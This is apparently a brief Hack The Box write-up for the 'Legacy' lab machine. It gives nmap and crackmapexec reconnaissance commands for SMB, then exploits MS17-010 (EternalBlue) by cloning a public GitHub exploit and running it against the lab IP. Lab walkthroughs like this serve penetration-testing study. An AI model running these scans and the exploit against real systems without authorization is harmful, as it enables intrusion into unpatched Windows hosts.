Legacy - Hack The Box
Reconnaissance
- Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.10.10.4
- Vulnerability and version scan
nmap -sCV -p135,139,445 -vvv 10.10.10.4
- Try to connect smb with crackmapexec
crackmapexec smb 10.10.10.4 -u guest -p ''
Probably will be vulnerable to EthernalBlue
- Vulnerability Scan
nmap -p445 --script smb-vuln-ms17-010 10.10.10.4
Exploitation
- Ethernal Blue MS17-010 (CVE-2017-0143)
git clone https://github.com/n3rdh4x0r/MS17-010.git
cd MS17-010
python3 exploit.py 10.10.10.4
